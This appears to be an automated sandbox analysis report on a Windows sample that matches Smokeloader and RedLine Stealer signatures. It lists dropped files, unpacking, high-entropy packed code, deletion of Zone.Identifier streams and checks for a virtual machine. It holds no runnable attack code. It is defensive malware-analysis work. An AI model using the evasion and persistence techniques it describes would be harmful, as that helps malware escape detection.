      Source: rghrbbi.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: wehrbbi.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: wBgwzVbZuV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: wBgwzVbZuV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: F421.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: rghrbbi.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: wehrbbi.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@26/3
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02DFA8A7 CreateToolhelp32Snapshot,Module32First,0_2_02DFA8A7
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wehrbbiJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F421.tmpJump to behavior
      Source: wBgwzVbZuV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: wBgwzVbZuV.exeReversingLabs: Detection: 42%
      Source: unknownProcess created: C:\Users\user\Desktop\wBgwzVbZuV.exe "C:\Users\user\Desktop\wBgwzVbZuV.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wehrbbi C:\Users\user\AppData\Roaming\wehrbbi
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F421.exe C:\Users\user\AppData\Local\Temp\F421.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\rghrbbi C:\Users\user\AppData\Roaming\rghrbbi
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wehrbbi C:\Users\user\AppData\Roaming\wehrbbi
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\rghrbbi C:\Users\user\AppData\Roaming\rghrbbi
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F421.exe C:\Users\user\AppData\Local\Temp\F421.exeJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeUnpacked PE file: 0.2.wBgwzVbZuV.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dejunug:W;.manu:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\wehrbbiUnpacked PE file: 5.2.wehrbbi.400000.0.unpack .text:ER;.rdata:R;.data:W;.dejunug:W;.manu:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\F421.exeUnpacked PE file: 6.2.F421.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tuje:W;.wekigof:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\rghrbbiUnpacked PE file: 8.2.rghrbbi.400000.0.unpack .text:ER;.rdata:R;.data:W;.tuje:W;.wekigof:W;.rsrc:R; vs .text:EW;
      Source: wBgwzVbZuV.exeStatic PE information: section name: .dejunug
      Source: wBgwzVbZuV.exeStatic PE information: section name: .manu
      Source: F421.exe.1.drStatic PE information: section name: .tuje
      Source: F421.exe.1.drStatic PE information: section name: .wekigof
      Source: rghrbbi.1.drStatic PE information: section name: .tuje
      Source: rghrbbi.1.drStatic PE information: section name: .wekigof
      Source: wehrbbi.1.drStatic PE information: section name: .dejunug
      Source: wehrbbi.1.drStatic PE information: section name: .manu
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02C31540 pushad ; ret 0_2_02C31550
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02DFC6A3 push B63524ADh; retn 001Fh0_2_02DFC6DA
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02DFD1A0 pushfd ; iretd 0_2_02DFD1A1
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02DFE300 push esp; ret 0_2_02DFE302
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02C71540 pushad ; ret 5_2_02C71550
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02D2E0E8 push esp; ret 5_2_02D2E0EA
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02D2C48B push B63524ADh; retn 001Fh5_2_02D2C4C2
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02D2CF88 pushfd ; iretd 5_2_02D2CF89
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00402842 pushad ; retf F6A4h6_2_004029D1
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401065 pushfd ; retf 6_2_0040106A
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00402805 push 21CACAEFh; iretd 6_2_0040280A
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00402511 push ebp; iretd 6_2_00402523
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00403325 push eax; ret 6_2_004033F3
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00403433 pushad ; ret 6_2_004035AB
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401182 push esp; retf 6_2_0040118E
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00402A9D pushad ; retf 6_2_00402AAB
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_004012B7 push cs; iretd 6_2_004012B8
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB10CC pushfd ; retf 6_2_02CB10D1
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB11E9 push esp; retf 6_2_02CB11F5
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB286C push 21CACAEFh; iretd 6_2_02CB2871
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB2578 push ebp; iretd 6_2_02CB258A
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB2B04 pushad ; retf 6_2_02CB2B12
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB131E push cs; iretd 6_2_02CB131F
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00402842 pushad ; retf F6A4h8_2_004029D1
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00401065 pushfd ; retf 8_2_0040106A
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00402805 push 21CACAEFh; iretd 8_2_0040280A
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00402511 push ebp; iretd 8_2_00402523
      Source: wBgwzVbZuV.exeStatic PE information: section name: .text entropy: 7.553501827115452
      Source: F421.exe.1.drStatic PE information: section name: .text entropy: 7.553991384861311
      Source: rghrbbi.1.drStatic PE information: section name: .text entropy: 7.553991384861311
      Source: wehrbbi.1.drStatic PE information: section name: .text entropy: 7.553501827115452
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghrbbiJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wehrbbiJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F421.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghrbbiJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wehrbbiJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\wbgwzvbzuv.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wehrbbi:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rghrbbi:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\wehrbbiAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\wehrbbiAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Local\Temp\F421.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Local\Temp\F421.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\rghrbbiAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\rghrbbiAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: F421.exe, 00000006.00000002.2354567904.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: wehrbbi, 00000005.00000002.2011356762.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKNC5
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401E65 rdtsc 6_2_00401E65
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 451Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1080Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 761Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2115Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3244Thread sleep count: 451 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1136Thread sleep count: 1080 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1136Thread sleep time: -108000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2304Thread sleep count: 761 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2304Thread sleep time: -76100s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 792Thread sleep count: 327 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3052Thread sleep count: 274 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 764Thread sleep count: 278 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2076Thread sleep count: 41 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6804Thread sleep count: 108 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1136Thread sleep count: 2115 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1136Thread sleep time: -211500s >= -30000sJump to behavior
      Source: explorer.exe, 00000001.00000000.1735407211.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1734283056.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1735407211.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
